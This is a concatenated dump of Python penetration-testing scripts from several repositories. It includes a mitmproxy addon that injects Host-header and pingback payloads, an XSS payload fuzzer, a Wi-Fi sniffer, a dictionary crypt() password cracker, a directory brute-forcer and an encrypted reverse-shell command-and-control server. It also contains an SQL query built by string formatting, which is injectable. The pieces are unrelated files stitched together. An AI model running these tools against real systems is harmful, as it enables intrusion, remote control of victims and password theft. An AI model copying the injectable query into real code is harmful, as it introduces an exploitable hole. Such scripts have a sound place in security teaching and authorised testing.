self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.sock.connect((host, port))
dbg('Connected with {}'.format(host))
return True
except Exception as e:
ctx.log.error('[!] Could not connect with {}:{}!'.format(host, port))
if config['debug']:
raise
return False
def close(self):
if self.sock:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
self.sock = None
self.raw_socket = None
self.ssl_socket = None
def receiveAll(self, chunk_size=CHUNK_SIZE):
chunks = []
while True:
chunk = None
try:
chunk = self.sock.recv(int(chunk_size))
except:
if chunk:
chunks.append(chunk)
break
if chunk:
chunks.append(chunk)
else:
break
return b''.join(chunks)
def send(self, host, port, ssl, data, timeout = CONNECTION_TIMEOUT):
if not self.connect(host, port, ssl, timeout):
return False
self.sock.send(data.encode())
resp = self.receiveAll()
self.close()
return resp
class PyCollaboratorMitmproxyAddon:
method = b''
request = None
requestBody = None
def __init__(self):
global config
self.databaseInstance = self.connection = None
if CONFIGURATION_FILE:
config.update(json.loads(open(CONFIGURATION_FILE).read()))
ctx.log.info('Initializing py-collaborator-mitmproxy-plugin.')
self.connection = None
self.createConnection()
def createConnection(self):
self.databaseInstance = Database()
ctx.log.info("Connecting to MySQL database: {}@{} ...".format(
config['mysql-user'], config['mysql-host']
))
self.connection = self.databaseInstance.connection( config['mysql-host'],
config['mysql-user'],
config['mysql-pass'],
config['mysql-database'])
if not self.connection:
ctx.log.error('Could not connect to the MySQL database! ' \
'Please configure inner `MySQL` variables such as Host, User, Password.')
sys.exit(1)
ctx.log.info('Connected.')
def executeSql(self, query, params = None):
try:
assert self.connection
database_lock.acquire()
if not params:
out = self.databaseInstance.query(query)
else:
out = self.databaseInstance.query(query, params = params)
database_lock.release()
if not out:
return []
return out
except Exception as e:
ctx.log.error('SQL query ("{}", params: {}) has failed: {}'.format(
query, str(params), str(e)
))
database_lock.release()
if config['debug']:
raise
return []
@staticmethod
@memoize
def requestToString(request):
headers = '\r\n'.join(['{}: {}'.format(k, v) for k, v in request.headers.items()])
out = '{} {} {}\r\n{}'.format(request.command, request.path, request.request_version, headers)
return out
@staticmethod
def getPingbackUrl(request):
#guid = str(uuid.uuid4())
guid = generateRandomId()
url = "http://{}.{}/".format(guid, config['pingback-host'])
return (url, guid)
def saveRequestForCorrelation(self, request, pingback, uuid, where):
query = 'INSERT INTO requests(id, sent, uuid, desthost, pingback, whereput, request) VALUES(%s, %s, %s, %s, %s, %s, %s)'
generatedRequest = PyCollaboratorMitmproxyAddon.requestToString(self.request)
desthost = self.request.headers['Host']
values = ('0', datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'), uuid, desthost, pingback, where, generatedRequest)
self.executeSql(query, values)
@staticmethod
def sendRawRequest(request, requestData):
raw = SendRawHttpRequest()
port = 80 if request.scheme == 'http' else 443
return raw.send(request.headers['Host'], port, request.scheme == 'https', requestData)
def hostOverriding(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
requestData = 'GET {} HTTP/1.1\r\n'.format(pingback)
requestData+= 'Host: {}\r\n'.format(self.request.headers['Host'])
requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n'
requestData+= 'Accept: */*\r\n'
requestData+= 'Connection: close\r\n'
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Overridden Host header ({} -> GET {} )'.format(self.request.headers['Host'], pingback))
PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)
ctx.log.info('(2) Re-sent host overriding request ({} -> {})'.format(self.request.path, pingback))
def hostAtManipulation(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
url = urljoin(self.request.scheme + '://', self.request.headers['Host'], self.request.path)
parsed = urlparse(pingback)
requestData = 'GET {} HTTP/1.1\r\n'.format(pingback)
requestData+= 'Host: {}@{}\r\n'.format(self.request.headers['Host'], parsed.netloc)
requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n'
requestData+= 'Accept: */*\r\n'
requestData+= 'Connection: close\r\n'
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Host header manipulation ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc))
PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)
ctx.log.info('(3) Re-sent host header @ manipulated request ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc))
def sendMisroutedRequests(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
url = self.request.url
parsed = urlparse(pingback)
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc))
try:
dbg('GET {}'.format(url))
requests.get(url, headers = {'Host' : parsed.netloc})
ctx.log.info('(1) Re-sent misrouted request with hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc))
except (Exception, requests.exceptions.TooManyRedirects) as e:
ctx.log.error('Could not issue request to ({}): {}'.format(url, str(e)))
if config['debug']:
raise
self.hostOverriding()
self.hostAtManipulation()
@memoize
def checkIfAlreadyManipulated(self, host):
query = 'SELECT desthost FROM {}.requests WHERE desthost = "{}"'.format(config['mysql-database'], host)
rows = self.executeSql(query)
if rows == False: return rows
for row in rows:
if self.request.headers['Host'] in row['desthost']:
dbg('Host ({}) already was lured for pingback.'.format(row['desthost']))
return True
dbg('Host ({}) was not yet lured for pingback.'.format(self.request.headers['Host']))
return False
def request_handler(self, req, req_body):
global visited_hosts
self.request = req
self.requestBody = req_body
self.request.scheme = self.request.path.split(':')[0].upper()
allowed_letters = string.ascii_lowercase + string.digits + '-_.'
host = ''.join(list(filter(lambda x: x in allowed_letters, self.request.headers['Host'])))
if (host not in visited_hosts) and (not self.checkIfAlreadyManipulated(host)):
add_host_lock.acquire()
visited_hosts.add(host)
add_host_lock.release()
for header in append_headers:
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
self.request.headers[header] = pingback
if 'IP' in header:
self.request.headers[header] = '{}.{}'.format(uuid, config['pingback-host'])
            self.saveRequestForCorrelation(self.request, pingback, uuid, 'Header: {}'.format(header))
self.sendMisroutedRequests()
ctx.log.info('Injected pingbacks for host ({}).'.format(host))
return self.requestBody
def requestForMitmproxy(self, flow):
class Request:
def __init__(self, flow):
self.scheme = flow.request.scheme
self.path = flow.request.path
self.method = flow.request.method
self.command = flow.request.method
self.host = str(flow.request.host)
self.port = int(flow.request.port)
self.http_version = flow.request.http_version
self.request_version = flow.request.http_version
self.headers = {}
self.req_body = flow.request.content
self.url = flow.request.url
self.headers['Host'] = self.host
for k,v in flow.request.headers.items():
self.headers[k] = v
def __str__(self):
out = '{} {} {}\r\n'.format(self.method, self.path, self.http_version)
for k, v in self.headers.items():
out += '{}: {}\r\n'.format(k, v)
if self.req_body:
out += '\r\n{}'.format(self.req_body)
return out + '\r\n'
req = Request(flow)
req_body = req.req_body
# ctx.log.info('DEBUG2: req.path = {}'.format(req.path))
# ctx.log.info('DEBUG2: req.url = {}'.format(req.url))
# ctx.log.info('DEBUG5: req.request_version = {}'.format(req.request_version))
# ctx.log.info('DEBUG5: req.headers = {}'.format(str(req.headers)))
# ctx.log.info('DEBUG5: req.req_body = ({})'.format(req.req_body))
# ctx.log.info('DEBUG6: REQUEST BODY:\n{}'.format(str(req)))
return self.request_handler(req, req_body)
def request(flow: http.HTTPFlow) -> None:
globalPyCollaborator.requestForMitmproxy(flow)
globalPyCollaborator = PyCollaboratorMitmproxyAddon()
addons = [request]
| 35.155738 | 192 | 0.585097 |
Effective-Python-Penetration-Testing | import mechanize
url = "http://www.webscantest.com/crosstraining/aboutyou.php"
browser = mechanize.Browser()
attackNumber = 1
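# XSS-vectors.txt is read one payload per line and each line is submitted via
# the "fname" form field below. An illustrative (hypothetical) wordlist entry:
#
#   <script>alert('XSS')</script>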
with open('XSS-vectors.txt') as f:
for line in f:
browser.open(url)
browser.select_form(nr=0)
browser["fname"] = line
res = browser.submit()
content = res.read()
# check the attack vector is printed in the response.
if content.find(line) > 0:
print "Possible XXS"
output = open('response/'+str(attackNumber)+'.txt', 'w')
output.write(content)
output.close()
print attackNumber
attackNumber += 1
| 23.782609 | 61 | 0.676626 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: ifacesdetails.py
Purpose: Provides the details related to a systems interfaces
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import netifaces
except:
sys.exit("[!] Install the netifaces library: pip install netifaces")
gateways = {}
network_ifaces={}
def get_interfaces():
interfaces = netifaces.interfaces()
return interfaces
def get_gateways():
gateway_dict = {}
gws = netifaces.gateways()
for gw in gws:
try:
gateway_iface = gws[gw][netifaces.AF_INET]
gateway_ip, iface = gateway_iface[0], gateway_iface[1]
gw_list =[gateway_ip, iface]
gateway_dict[gw]=gw_list
except:
pass
return gateway_dict
def get_addresses(interface):
addrs = netifaces.ifaddresses(interface)
link_addr = addrs[netifaces.AF_LINK]
iface_addrs = addrs[netifaces.AF_INET]
iface_dict = iface_addrs[0]
link_dict = link_addr[0]
hwaddr = link_dict.get('addr')
iface_addr = iface_dict.get('addr')
iface_broadcast = iface_dict.get('broadcast')
iface_netmask = iface_dict.get('netmask')
return hwaddr, iface_addr, iface_broadcast, iface_netmask
def get_networks(gateways_dict):
networks_dict = {}
    for key, value in gateways_dict.iteritems():
gateway_ip, iface = value[0], value[1]
hwaddress, addr, broadcast, netmask = get_addresses(iface)
network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask}
networks_dict[iface] = network
return networks_dict
gateways = get_gateways()
network_ifaces = get_networks(gateways)
print(network_ifaces)
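# Illustrative output shape only (interface name and addresses are hypothetical;
# the keys mirror the dictionary built in get_networks above):
#
# {'eth0': {'gateway': '192.168.1.1', 'hwaddr': '00:11:22:33:44:55',
#           'addr': '192.168.1.10', 'broadcast': '192.168.1.255',
#           'netmask': '255.255.255.0'}}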
| 38.209877 | 124 | 0.727874 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "LDAP Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalLDAPinjection")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.181818 | 75 | 0.78125 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
import struct
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2, \
"-- Channel--> ", ord(fm[Dot11Elt:3].info)
sniff(iface=interface,prn=info)
| 23.857143 | 56 | 0.608069 |
owtf | """
owtf.lib.exceptions
~~~~~~~~~~~~~~~~~~~
Declares the framework exceptions and HTTP errors
"""
try:
from http.client import responses
except ImportError:
from httplib import responses
import tornado.web
class FrameworkException(Exception):
def __init__(self, value):
self.parameter = value
def __repr__(self):
return self.parameter
class APIError(tornado.web.HTTPError):
"""Equivalent to ``RequestHandler.HTTPError`` except for in name"""
def api_assert(condition, *args, **kwargs):
"""Assertion to fail with if not ``condition``
Asserts that ``condition`` is ``True``, else raises an ``APIError``
with the provided ``args`` and ``kwargs``
:type condition: bool
"""
if not condition:
raise APIError(*args, **kwargs)
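# Illustrative usage only (not from the original module): fail a handler with
# an HTTP 400 when a required parameter is missing.
#
#   api_assert(target_id is not None, 400, log_message="target_id is required")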
class FrameworkAbortException(FrameworkException):
pass
class PluginAbortException(FrameworkException):
pass
class UnreachableTargetException(FrameworkException):
pass
class UnresolvableTargetException(FrameworkException):
pass
class DBIntegrityException(FrameworkException):
pass
class InvalidTargetReference(FrameworkException):
pass
class InvalidSessionReference(FrameworkException):
pass
class InvalidTransactionReference(FrameworkException):
pass
class InvalidParameterType(FrameworkException):
pass
class InvalidWorkerReference(FrameworkException):
pass
class InvalidErrorReference(FrameworkException):
pass
class InvalidWorkReference(FrameworkException):
pass
class InvalidConfigurationReference(FrameworkException):
pass
class InvalidUrlReference(FrameworkException):
pass
class InvalidActionReference(FrameworkException):
pass
class InvalidMessageReference(FrameworkException):
pass
class InvalidMappingReference(FrameworkException):
pass
class DatabaseNotRunningException(Exception):
pass
class PluginException(Exception):
pass
class PluginsDirectoryDoesNotExist(PluginException):
"""The specified plugin directory does not exist."""
class PluginsAlreadyLoaded(PluginException):
"""`load_plugins()` called twice."""
| 17.067227 | 71 | 0.74174 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Hybrid - Server - TCP Reverse Shell
import socket
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
import string
import random
def encrypt_AES_KEY(KEY):
publickey ="""-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9UHDhYrU529GsfkJqKSF
6q3CfpSkb00gA12c3NuNb2QZgpkHRsfQ/zPmKlFvuAHNjn43j3ser/SQ6q0GN92N
niK9cne+UdKoXf0e+8PqZsoIlOXh9QNPnuXmD+o6tXevh3ZpUyCaNPiF+g0fHv12
w1xCkVki5Kp+hf8YbB6lCxUJvf8a0n1bWCBKkbe2jJUOjkVLIvUVkojCOw61stHZ
QJtFgGQUup4D0cozs5bXHfRw7Tc7Q2VEnTOGfIEZJcC7FbboMaQxRu0v7KKH93OR
HlIEbZFFX7kelrR8S8pnIfspZXHrAmSImlWDljeSZpMViTGLBniw0kztDLtQJSY4
HL4SkOTm0QgsO1dkbs3PR2RsYh7aaDWgAATT0MPhQMUNMIdceaEJeYiudsBFMLMQ
JHok3+0MR/1eO4aO2nH5ojANXxOyec8V3IXz0LZCGFsrfB9gv9TD/YRs6qEF62wl
tDqIGyVQoXQNmxriH+0YgMwxUPKHiGVCaPYXe5dpd89GeGYC6Jcbc9+q9cjfG+kR
GQtgr/w48RM79bBHw5A0b3uXqmjTPTgZ6hMxShMWngSHOm5BV+ZY1MyEA51+qDon
GOLCYLRGWnF1PyCMoxX+qVEE6gAFVNkYULdjiWpU+gmoYxe0rNqjCzbUdXizUGVQ
Ua9aLXDYbrOz6O1gKngclsECAwEAAQ==
-----END PUBLIC KEY-----"""
encryptor = RSA.importKey(publickey)
encriptedData=encryptor.encrypt(KEY, 0)
return encriptedData[0]
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
global key
key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(32))
print "Generated AES Key " + str(key)
conn.send ( encrypt_AES_KEY(key) )
global counter
counter = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(16))
conn.send ( encrypt_AES_KEY(counter) )
while True:
command = raw_input("Shell> ")
command = encrypt(command)
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
else:
conn.send(command)
print decrypt ( conn.recv(1024) )
def main ():
connect()
main()
| 27.046729 | 169 | 0.668333 |
PenetrationTestingScripts | # Taken from Python 2.6.4 for use by _sgmllib.py
"""Shared support for scanning document type declarations in HTML and XHTML.
This module is used as a foundation for the HTMLParser and sgmllib
modules (indirectly, for htmllib as well). It has no documented
public API and should not be used directly.
"""
import re
_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match
_declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match
_commentclose = re.compile(r'--\s*>')
_markedsectionclose = re.compile(r']\s*]\s*>')
# An analysis of the MS-Word extensions is available at
# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
_msmarkedsectionclose = re.compile(r']\s*>')
del re
class ParserBase:
"""Parser base class which provides some common support methods used
by the SGML/HTML and XHTML parsers."""
def __init__(self):
if self.__class__ is ParserBase:
raise RuntimeError(
"markupbase.ParserBase must be subclassed")
def error(self, message):
raise NotImplementedError(
"subclasses of ParserBase must override error()")
def reset(self):
self.lineno = 1
self.offset = 0
def getpos(self):
"""Return current line number and offset."""
return self.lineno, self.offset
# Internal -- update line number and offset. This should be
# called for each piece of data exactly once, in order -- in other
# words the concatenation of all the input strings to this
# function should be exactly the entire input.
def updatepos(self, i, j):
if i >= j:
return j
rawdata = self.rawdata
nlines = rawdata.count("\n", i, j)
if nlines:
self.lineno = self.lineno + nlines
pos = rawdata.rindex("\n", i, j) # Should not fail
self.offset = j-(pos+1)
else:
self.offset = self.offset + j-i
return j
_decl_otherchars = ''
# Internal -- parse declaration (for use by subclasses).
def parse_declaration(self, i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
# ISO 8879:1986, however, has more complex
# declaration syntax for elements in <!...>, including:
# --comment--
# [marked section]
# name in the following list: ENTITY, DOCTYPE, ELEMENT,
# ATTLIST, NOTATION, SHORTREF, USEMAP,
# LINKTYPE, LINK, IDLINK, USELINK, SYSTEM
rawdata = self.rawdata
j = i + 2
assert rawdata[i:j] == "<!", "unexpected call to parse_declaration"
if rawdata[j:j+1] == ">":
# the empty comment <!>
return j + 1
if rawdata[j:j+1] in ("-", ""):
# Start of comment followed by buffer boundary,
# or just a buffer boundary.
return -1
# A simple, practical version could look like: ((name|stringlit) S*) + '>'
n = len(rawdata)
if rawdata[j:j+2] == '--': #comment
# Locate --.*-- as the body of the comment
return self.parse_comment(i)
elif rawdata[j] == '[': #marked section
# Locate [statusWord [...arbitrary SGML...]] as the body of the marked section
# Where statusWord is one of TEMP, CDATA, IGNORE, INCLUDE, RCDATA
# Note that this is extended by Microsoft Office "Save as Web" function
# to include [if...] and [endif].
return self.parse_marked_section(i)
else: #all other declaration elements
decltype, j = self._scan_name(j, i)
if j < 0:
return j
if decltype == "doctype":
self._decl_otherchars = ''
while j < n:
c = rawdata[j]
if c == ">":
# end of declaration syntax
data = rawdata[i+2:j]
if decltype == "doctype":
self.handle_decl(data)
else:
self.unknown_decl(data)
return j + 1
if c in "\"'":
m = _declstringlit_match(rawdata, j)
if not m:
return -1 # incomplete
j = m.end()
elif c in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
name, j = self._scan_name(j, i)
elif c in self._decl_otherchars:
j = j + 1
elif c == "[":
# this could be handled in a separate doctype parser
if decltype == "doctype":
j = self._parse_doctype_subset(j + 1, i)
elif decltype in ("attlist", "linktype", "link", "element"):
# must tolerate []'d groups in a content model in an element declaration
# also in data attribute specifications of attlist declaration
# also link type declaration subsets in linktype declarations
# also link attribute specification lists in link declarations
self.error("unsupported '[' char in %s declaration" % decltype)
else:
self.error("unexpected '[' char in declaration")
else:
self.error(
"unexpected %r char in declaration" % rawdata[j])
if j < 0:
return j
return -1 # incomplete
# Internal -- parse a marked section
# Override this to handle MS-word extension syntax <![if word]>content<![endif]>
def parse_marked_section(self, i, report=1):
rawdata= self.rawdata
assert rawdata[i:i+3] == '<![', "unexpected call to parse_marked_section()"
sectName, j = self._scan_name( i+3, i )
if j < 0:
return j
if sectName in ("temp", "cdata", "ignore", "include", "rcdata"):
# look for standard ]]> ending
match= _markedsectionclose.search(rawdata, i+3)
elif sectName in ("if", "else", "endif"):
# look for MS Office ]> ending
match= _msmarkedsectionclose.search(rawdata, i+3)
else:
self.error('unknown status keyword %r in marked section' % rawdata[i+3:j])
if not match:
return -1
if report:
j = match.start(0)
self.unknown_decl(rawdata[i+3: j])
return match.end(0)
# Internal -- parse comment, return length or -1 if not terminated
def parse_comment(self, i, report=1):
rawdata = self.rawdata
if rawdata[i:i+4] != '<!--':
self.error('unexpected call to parse_comment()')
match = _commentclose.search(rawdata, i+4)
if not match:
return -1
if report:
j = match.start(0)
self.handle_comment(rawdata[i+4: j])
return match.end(0)
# Internal -- scan past the internal subset in a <!DOCTYPE declaration,
# returning the index just past any whitespace following the trailing ']'.
def _parse_doctype_subset(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
j = i
while j < n:
c = rawdata[j]
if c == "<":
s = rawdata[j:j+2]
if s == "<":
# end of buffer; incomplete
return -1
if s != "<!":
self.updatepos(declstartpos, j + 1)
self.error("unexpected char in internal subset (in %r)" % s)
if (j + 2) == n:
# end of buffer; incomplete
return -1
if (j + 4) > n:
# end of buffer; incomplete
return -1
if rawdata[j:j+4] == "<!--":
j = self.parse_comment(j, report=0)
if j < 0:
return j
continue
name, j = self._scan_name(j + 2, declstartpos)
if j == -1:
return -1
if name not in ("attlist", "element", "entity", "notation"):
self.updatepos(declstartpos, j + 2)
self.error(
"unknown declaration %r in internal subset" % name)
# handle the individual names
meth = getattr(self, "_parse_doctype_" + name)
j = meth(j, declstartpos)
if j < 0:
return j
elif c == "%":
# parameter entity reference
if (j + 1) == n:
# end of buffer; incomplete
return -1
s, j = self._scan_name(j + 1, declstartpos)
if j < 0:
return j
if rawdata[j] == ";":
j = j + 1
elif c == "]":
j = j + 1
while j < n and rawdata[j].isspace():
j = j + 1
if j < n:
if rawdata[j] == ">":
return j
self.updatepos(declstartpos, j)
self.error("unexpected char after internal subset")
else:
return -1
elif c.isspace():
j = j + 1
else:
self.updatepos(declstartpos, j)
self.error("unexpected char %r in internal subset" % c)
# end of buffer reached
return -1
# Internal -- scan past <!ELEMENT declarations
def _parse_doctype_element(self, i, declstartpos):
name, j = self._scan_name(i, declstartpos)
if j == -1:
return -1
# style content model; just skip until '>'
rawdata = self.rawdata
if '>' in rawdata[j:]:
return rawdata.find(">", j) + 1
return -1
# Internal -- scan past <!ATTLIST declarations
def _parse_doctype_attlist(self, i, declstartpos):
rawdata = self.rawdata
name, j = self._scan_name(i, declstartpos)
c = rawdata[j:j+1]
if c == "":
return -1
if c == ">":
return j + 1
while 1:
# scan a series of attribute descriptions; simplified:
# name type [value] [#constraint]
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
c = rawdata[j:j+1]
if c == "":
return -1
if c == "(":
# an enumerated type; look for ')'
if ")" in rawdata[j:]:
j = rawdata.find(")", j) + 1
else:
return -1
while rawdata[j:j+1].isspace():
j = j + 1
if not rawdata[j:]:
# end of buffer, incomplete
return -1
else:
name, j = self._scan_name(j, declstartpos)
c = rawdata[j:j+1]
if not c:
return -1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if m:
j = m.end()
else:
return -1
c = rawdata[j:j+1]
if not c:
return -1
if c == "#":
if rawdata[j:] == "#":
# end of buffer
return -1
name, j = self._scan_name(j + 1, declstartpos)
if j < 0:
return j
c = rawdata[j:j+1]
if not c:
return -1
if c == '>':
# all done
return j + 1
# Internal -- scan past <!NOTATION declarations
def _parse_doctype_notation(self, i, declstartpos):
name, j = self._scan_name(i, declstartpos)
if j < 0:
return j
rawdata = self.rawdata
while 1:
c = rawdata[j:j+1]
if not c:
# end of buffer; incomplete
return -1
if c == '>':
return j + 1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if not m:
return -1
j = m.end()
else:
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
# Internal -- scan past <!ENTITY declarations
def _parse_doctype_entity(self, i, declstartpos):
rawdata = self.rawdata
if rawdata[i:i+1] == "%":
j = i + 1
while 1:
c = rawdata[j:j+1]
if not c:
return -1
if c.isspace():
j = j + 1
else:
break
else:
j = i
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
while 1:
c = self.rawdata[j:j+1]
if not c:
return -1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if m:
j = m.end()
else:
return -1 # incomplete
elif c == ">":
return j + 1
else:
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
# Internal -- scan a name token and the new position and the token, or
# return -1 if we've reached the end of the buffer.
def _scan_name(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
if i == n:
return None, -1
m = _declname_match(rawdata, i)
if m:
s = m.group()
name = s.strip()
if (i + len(s)) == n:
return None, -1 # end of buffer
return name.lower(), m.end()
else:
self.updatepos(declstartpos, i)
self.error("expected name token at %r"
% rawdata[declstartpos:declstartpos+20])
# To be overridden -- handlers for unknown objects
def unknown_decl(self, data):
pass
| 35.548223 | 92 | 0.47295 |
diff-droid | def update():
print "to do : do git update" | 23 | 33 | 0.617021 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('dictionary.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
if cryptWord == cryptPass:
print '[+] Found Password: ' + word + '\n'
return
print '[-] Password Not Found.\n'
return
def main():
passFile = open('passwords.txt')
for line in passFile.readlines():
if ':' in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print '[*] Cracking Password For: ' + user
testPass(cryptPass)
if __name__ == '__main__':
main()
| 23.387097 | 54 | 0.529801 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
Name: dirtester.py
Purpose: To identify unlinked and hidden files or directories within web applications
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys
def host_test(filename, host):
file = "headrequests.log"
bufsize = 0
e = open(file, 'a', bufsize)
print("[*] Reading file %s") % (file)
with open(filename) as f:
locations = f.readlines()
for item in locations:
target = host + "/" + item
try:
request = urllib2.Request(target)
request.get_method = lambda : 'GET'
response = urllib2.urlopen(request)
except:
print("[-] %s is invalid") % (str(target.rstrip('\n')))
response = None
if response != None:
print("[+] %s is valid") % (str(target.rstrip('\n')))
details = response.info()
e.write(str(details))
e.close()
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t http://127.0.0.1] [-f wordlist] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="target", default=None, help="Host to test")
